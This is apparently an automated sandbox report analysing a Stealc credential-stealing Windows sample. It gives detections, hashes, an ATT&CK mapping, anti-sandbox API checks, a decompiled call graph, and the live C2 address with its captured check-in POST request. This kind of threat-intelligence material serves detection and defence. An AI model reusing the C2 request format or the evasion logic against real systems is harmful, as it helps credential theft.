Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01014610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,1_2_01014610
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_010146A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_010146A0
Source: file.exe, file.exe, 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: C(Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_01012D60
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01011B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,1_2_01011B20
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01012A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_01012A40
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01012C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_01012C10

              Stealing of Sensitive Information

Source: Yara match | File source: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1330851446.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1389602747.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7708, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1330851446.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1389602747.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7708, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | Create Account (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (13) | DLL Side-Loading (1) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (4) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
file.exe | 39% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.phpft | 100% | Avira URL Cloud | malware
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php? | file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpft | file.exe, 00000001.00000002.1389602747.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206 | file.exe, 00000001.00000002.1389602747.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/; | file.exe, 00000001.00000002.1389602747.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpc | file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/X | file.exe, 00000001.00000002.1389602747.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpw | file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1559392
                              Start date and time:2024-11-20 13:26:09 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 27s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 79%
                              • Number of executed functions: 18
                              • Number of non-executed functions: 117
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
                              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.43
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | LummaC | 185.215.113.16
 | file.exe | malicious | LummaC | 185.215.113.16
 | file.exe | malicious | Stealc | 185.215.113.206
 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
 | file.exe | malicious | Amadey | 185.215.113.43
 | file.exe | malicious | LummaC | 185.215.113.16
 | file.exe | malicious | Stealc | 185.215.113.206
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
No context
                              No created / dropped files found
                               File type: PE32 executable (GUI) Intel 80386, for MS Windows
                               Entropy (8bit): 7.945386727584341
                               TrID:
                               • Win32 Executable (generic) a (10002005/4) 99.96%
                               • Generic Win/DOS Executable (2004/3) 0.02%
                               • DOS Executable Generic (2002/1) 0.02%
                               • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                               File name: file.exe
                               File size: 1'774'080 bytes
                               MD5: d1f75fb0b0afd1ea41c2dccd9c3d2427
                               SHA1: 6fdb92b4b415d69584ea1844ec2eed9f068f9640
                               SHA256: 3eee56925a00f1e0162ec92e9e2cb827a2977a229aa8e6e303d24849ae6d6469
                               SHA512: 0cdac8c2b9508edc06b27065b692d2268fa62949cb7813ae36f168f1ac7bd88c6cae3e2e121e42aec064681ffe387ab9757285c45b0008f19f8c0b5d9047eea4
                               SSDEEP: 49152:z5aFRvsfImgaY2RKIZE1dW5e00M8IfhF:z5aMfIm1+wE+52Mj
                               TLSH: 2A8533E435036AE6C12EDAFC65FCB655F3B9D1C0A4E46C334258AF370483D88E57AA46
                               File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                               Icon Hash: 00928e8e8686b000
                               Entrypoint: 0xa82000
                               Entrypoint Section: .taggant
                               Digitally signed: false
                               Imagebase: 0x400000
                               Subsystem: windows gui
                               Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                               DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                               Time Stamp: 0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                               TLS Callbacks:
                               CLR (.Net) Version:
                               OS Version Major: 5
                               OS Version Minor: 1
                               File Version Major: 5
                               File Version Minor: 1
                               Subsystem Version Major: 5
                               Subsystem Version Minor: 1
                               Import Hash: 2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007F76D8E0109Ah
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
                               Name | Virtual Address | Virtual Size | Is in Section
                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1ac | .rsrc
                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                | 0x1000 | 0x249000 | 0x16200 | 733c87cfa3669fdf28823e1a35c00846 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .rsrc | 0x24a000 | 0x1ac | 0x200 | 8b4456ef886919e03a5fd6b3f7311675 | False | 0.580078125 | data | 4.541827202327633 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                | 0x24c000 | 0x29d000 | 0x200 | 7b2d37d61980e0b633f1d272aab4d74d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               yuaygcvc | 0x4e9000 | 0x198000 | 0x197400 | 7401c1a0419d71b95691c17074a1aeae | False | 0.9945434795119705 | data | 7.953931532068962 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               tibvwtje | 0x681000 | 0x1000 | 0x400 | 07e9b161592cd4c6b2d5daa12ec60ebd | False | 0.79296875 | data | 6.2723607016152325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .taggant | 0x682000 | 0x3000 | 0x2200 | 06b8e76d94d9c4f0bcdeb5730f5187fd | False | 0.06330422794117647 | DOS executable (COM) | 0.7790019605752105 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                               RT_MANIFEST | 0x6800d8 | 0x152 | ASCII text, with CRLF line terminators |  |  | 0.6479289940828402
                               DLL | Import
                               kernel32.dll | lstrcpy
                               Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                               2024-11-20T13:27:19.578027+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49731 | 185.215.113.206 | 80 | TCP
                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Nov 20, 2024 13:27:18.343779087 CET | 49731 | 80 | 192.168.2.7 | 185.215.113.206
                               Nov 20, 2024 13:27:18.645263910 CET | 80 | 49731 | 185.215.113.206 | 192.168.2.7
                               Nov 20, 2024 13:27:18.645351887 CET | 49731 | 80 | 192.168.2.7 | 185.215.113.206
                               Nov 20, 2024 13:27:18.649369001 CET | 49731 | 80 | 192.168.2.7 | 185.215.113.206
                               Nov 20, 2024 13:27:18.655260086 CET | 80 | 49731 | 185.215.113.206 | 192.168.2.7
                               Nov 20, 2024 13:27:19.349715948 CET | 80 | 49731 | 185.215.113.206 | 192.168.2.7
                               Nov 20, 2024 13:27:19.349893093 CET | 49731 | 80 | 192.168.2.7 | 185.215.113.206
                               Nov 20, 2024 13:27:19.353347063 CET | 49731 | 80 | 192.168.2.7 | 185.215.113.206
                               Nov 20, 2024 13:27:19.358207941 CET | 80 | 49731 | 185.215.113.206 | 192.168.2.7
                               Nov 20, 2024 13:27:19.577837944 CET | 80 | 49731 | 185.215.113.206 | 192.168.2.7
                               Nov 20, 2024 13:27:19.578027010 CET | 49731 | 80 | 192.168.2.7 | 185.215.113.206
                               Nov 20, 2024 13:27:22.588435888 CET | 49731 | 80 | 192.168.2.7 | 185.215.113.206
                              • 185.215.113.206
                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               0 | 192.168.2.7 | 49731 | 185.215.113.206 | 80 | 7708 | C:\Users\user\Desktop\file.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Nov 20, 2024 13:27:18.649369001 CET | 90 | OUT | GET / HTTP/1.1
                              Host: 185.215.113.206
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                               Nov 20, 2024 13:27:19.349715948 CET | 203 | IN | HTTP/1.1 200 OK
                              Date: Wed, 20 Nov 2024 12:27:19 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                               Nov 20, 2024 13:27:19.353347063 CET | 412 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI
                              Host: 185.215.113.206
                              Content-Length: 210
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 37 46 33 46 35 37 41 38 36 43 31 31 38 30 30 38 36 39 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a
                              Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="hwid"167F3F57A86C118008692------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="build"mars------DGHJECAFIDAFHJKFCGHI--
                               Nov 20, 2024 13:27:19.577837944 CET | 210 | IN | HTTP/1.1 200 OK
                              Date: Wed, 20 Nov 2024 12:27:19 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                               Target ID: 1
                               Start time: 07:27:13
                               Start date: 20/11/2024
                               Path: C:\Users\user\Desktop\file.exe
                               Wow64 process (32bit): true
                               Commandline: "C:\Users\user\Desktop\file.exe"
                               Imagebase: 0xff0000
                               File size: 1'774'080 bytes
                               MD5 hash: D1F75FB0B0AFD1EA41C2DCCD9C3D2427
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: C, C++ or other language
                               Yara matches:
                               • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                               • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1330851446.0000000005210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                               • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1389602747.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                               Reputation: low
                               Has exited: true


                                Execution Graph

                                 Execution Coverage: 4.8%
                                 Dynamic/Decrypted Code Coverage: 0%
                                 Signature Coverage: 14.5%
                                 Total number of Nodes: 1348
                                 Total number of Limit Nodes: 29
                                execution_graph 25559 1011bf0 25611 ff2a90 25559->25611 25563 1011c03 25564 1011c29 lstrcpy 25563->25564 25565 1011c35 25563->25565 25564->25565 25566 1011c65 ExitProcess 25565->25566 25567 1011c6d GetSystemInfo 25565->25567 25568 1011c85 25567->25568 25569 1011c7d ExitProcess 25567->25569 25712 ff1030 GetCurrentProcess VirtualAllocExNuma 25568->25712 25574 1011ca2 25575 1011cb8 25574->25575 25576 1011cb0 ExitProcess 25574->25576 25724 1012ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25575->25724 25578 1011ce7 lstrlen 25583 1011cff 25578->25583 25579 1011cbd 25579->25578 25933 1012a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25579->25933 25581 1011cd1 25581->25578 25585 1011ce0 ExitProcess 25581->25585 25582 1011d23 lstrlen 25584 1011d39 25582->25584 25583->25582 25586 1011d13 lstrcpy lstrcat 25583->25586 25587 1011d5a 25584->25587 25589 1011d46 lstrcpy lstrcat 25584->25589 25586->25582 25588 1012ad0 3 API calls 25587->25588 25590 1011d5f lstrlen 25588->25590 25589->25587 25592 1011d74 25590->25592 25591 1011d9a lstrlen 25593 1011db0 25591->25593 25592->25591 25594 1011d87 lstrcpy lstrcat 25592->25594 25595 1011dce 25593->25595 25596 1011dba lstrcpy lstrcat 25593->25596 25594->25591 25726 1012a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25595->25726 25596->25595 25598 1011dd3 lstrlen 25599 1011de7 25598->25599 25600 1011df7 lstrcpy lstrcat 25599->25600 25601 1011e0a 25599->25601 25600->25601 25602 1011e28 lstrcpy 25601->25602 25603 1011e30 25601->25603 25602->25603 25604 1011e56 OpenEventA 25603->25604 25605 1011e68 CloseHandle Sleep OpenEventA 25604->25605 25606 1011e8c CreateEventA 25604->25606 25605->25605 25605->25606 25727 1011b20 GetSystemTime 25606->25727 25610 1011ea5 CloseHandle ExitProcess 25934 ff4a60 25611->25934 25613 ff2aa1 25614 ff4a60 2 API calls 25613->25614 25615 ff2ab7 25614->25615 25616 ff4a60 2 API calls 25615->25616 25617 ff2acd 25616->25617 25618 ff4a60 2 API calls 25617->25618 25619 ff2ae3 
25618->25619 25620 ff4a60 2 API calls 25619->25620 25621 ff2af9 25620->25621 25622 ff4a60 2 API calls 25621->25622 25623 ff2b0f 25622->25623 25624 ff4a60 2 API calls 25623->25624 25625 ff2b28 25624->25625 25626 ff4a60 2 API calls 25625->25626 25627 ff2b3e 25626->25627 25628 ff4a60 2 API calls 25627->25628 25629 ff2b54 25628->25629 25630 ff4a60 2 API calls 25629->25630 25631 ff2b6a 25630->25631 25632 ff4a60 2 API calls 25631->25632 25633 ff2b80 25632->25633 25634 ff4a60 2 API calls 25633->25634 25635 ff2b96 25634->25635 25636 ff4a60 2 API calls 25635->25636 25637 ff2baf 25636->25637 25638 ff4a60 2 API calls 25637->25638 25639 ff2bc5 25638->25639 25640 ff4a60 2 API calls 25639->25640 25641 ff2bdb 25640->25641 25642 ff4a60 2 API calls 25641->25642 25643 ff2bf1 25642->25643 25644 ff4a60 2 API calls 25643->25644 25645 ff2c07 25644->25645 25646 ff4a60 2 API calls 25645->25646 25647 ff2c1d 25646->25647 25648 ff4a60 2 API calls 25647->25648 25649 ff2c36 25648->25649 25650 ff4a60 2 API calls 25649->25650 25651 ff2c4c 25650->25651 25652 ff4a60 2 API calls 25651->25652 25653 ff2c62 25652->25653 25654 ff4a60 2 API calls 25653->25654 25655 ff2c78 25654->25655 25656 ff4a60 2 API calls 25655->25656 25657 ff2c8e 25656->25657 25658 ff4a60 2 API calls 25657->25658 25659 ff2ca4 25658->25659 25660 ff4a60 2 API calls 25659->25660 25661 ff2cbd 25660->25661 25662 ff4a60 2 API calls 25661->25662 25663 ff2cd3 25662->25663 25664 ff4a60 2 API calls 25663->25664 25665 ff2ce9 25664->25665 25666 ff4a60 2 API calls 25665->25666 25667 ff2cff 25666->25667 25668 ff4a60 2 API calls 25667->25668 25669 ff2d15 25668->25669 25670 ff4a60 2 API calls 25669->25670 25671 ff2d2b 25670->25671 25672 ff4a60 2 API calls 25671->25672 25673 ff2d44 25672->25673 25674 ff4a60 2 API calls 25673->25674 25675 ff2d5a 25674->25675 25676 ff4a60 2 API calls 25675->25676 25677 ff2d70 25676->25677 25678 ff4a60 2 API calls 25677->25678 25679 ff2d86 25678->25679 25680 ff4a60 2 API calls 25679->25680 25681 ff2d9c 25680->25681 
25682 ff4a60 2 API calls 25681->25682 25683 ff2db2 25682->25683 25684 ff4a60 2 API calls 25683->25684 25685 ff2dcb 25684->25685 25686 ff4a60 2 API calls 25685->25686 25687 ff2de1 25686->25687 25688 ff4a60 2 API calls 25687->25688 25689 ff2df7 25688->25689 25690 ff4a60 2 API calls 25689->25690 25691 ff2e0d 25690->25691 25692 ff4a60 2 API calls 25691->25692 25693 ff2e23 25692->25693 25694 ff4a60 2 API calls 25693->25694 25695 ff2e39 25694->25695 25696 ff4a60 2 API calls 25695->25696 25697 ff2e52 25696->25697 25698 1016390 GetPEB 25697->25698 25699 10165c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25698->25699 25700 10163c3 25698->25700 25701 1016625 GetProcAddress 25699->25701 25702 1016638 25699->25702 25709 10163d7 20 API calls 25700->25709 25701->25702 25703 1016641 GetProcAddress GetProcAddress 25702->25703 25704 101666c 25702->25704 25703->25704 25705 1016675 GetProcAddress 25704->25705 25706 1016688 25704->25706 25705->25706 25707 1016691 GetProcAddress 25706->25707 25708 10166a4 25706->25708 25707->25708 25710 10166d7 25708->25710 25711 10166ad GetProcAddress GetProcAddress 25708->25711 25709->25699 25710->25563 25711->25710 25713 ff105e VirtualAlloc 25712->25713 25714 ff1057 ExitProcess 25712->25714 25715 ff107d 25713->25715 25716 ff108a VirtualFree 25715->25716 25717 ff10b1 25715->25717 25716->25717 25718 ff10c0 25717->25718 25719 ff10d0 GlobalMemoryStatusEx 25718->25719 25721 ff1112 ExitProcess 25719->25721 25723 ff10f5 25719->25723 25722 ff111a GetUserDefaultLangID 25722->25574 25722->25575 25723->25721 25723->25722 25725 1012b24 25724->25725 25725->25579 25726->25598 25939 1011820 25727->25939 25729 1011b81 sscanf 25978 ff2a20 25729->25978 25732 1011be9 25735 100ffd0 25732->25735 25733 1011be2 ExitProcess 25734 1011bd6 25734->25732 25734->25733 25736 100ffe0 25735->25736 25737 1010019 lstrlen 25736->25737 25738 101000d lstrcpy 25736->25738 25739 10100d0 25737->25739 25738->25737 25740 10100e7 lstrlen 25739->25740 25741 10100db 
lstrcpy 25739->25741 25742 10100ff 25740->25742 25741->25740 25743 1010116 lstrlen 25742->25743 25744 101010a lstrcpy 25742->25744 25745 101012e 25743->25745 25744->25743 25746 1010145 25745->25746 25747 1010139 lstrcpy 25745->25747 25980 1011570 25746->25980 25747->25746 25750 101016e 25751 1010183 lstrcpy 25750->25751 25752 101018f lstrlen 25750->25752 25751->25752 25753 10101a8 25752->25753 25754 10101c9 lstrlen 25753->25754 25755 10101bd lstrcpy 25753->25755 25756 10101e8 25754->25756 25755->25754 25757 1010200 lstrcpy 25756->25757 25758 101020c lstrlen 25756->25758 25757->25758 25759 101026a 25758->25759 25760 1010282 lstrcpy 25759->25760 25761 101028e 25759->25761 25760->25761 25990 ff2e70 25761->25990 25769 1010540 25770 1011570 4 API calls 25769->25770 25771 101054f 25770->25771 25772 10105a1 lstrlen 25771->25772 25773 1010599 lstrcpy 25771->25773 25774 10105bf 25772->25774 25773->25772 25775 10105d1 lstrcpy lstrcat 25774->25775 25776 10105e9 25774->25776 25775->25776 25777 1010614 25776->25777 25778 101060c lstrcpy 25776->25778 25779 101061b lstrlen 25777->25779 25778->25777 25780 1010636 25779->25780 25781 101064a lstrcpy lstrcat 25780->25781 25782 1010662 25780->25782 25781->25782 25783 1010687 25782->25783 25784 101067f lstrcpy 25782->25784 25785 101068e lstrlen 25783->25785 25784->25783 25786 10106b3 25785->25786 25787 10106c7 lstrcpy lstrcat 25786->25787 25788 10106db 25786->25788 25787->25788 25789 1010704 lstrcpy 25788->25789 25790 101070c 25788->25790 25789->25790 25791 1010751 25790->25791 25792 1010749 lstrcpy 25790->25792 26746 1012740 GetWindowsDirectoryA 25791->26746 25792->25791 25794 1010785 26755 ff4c50 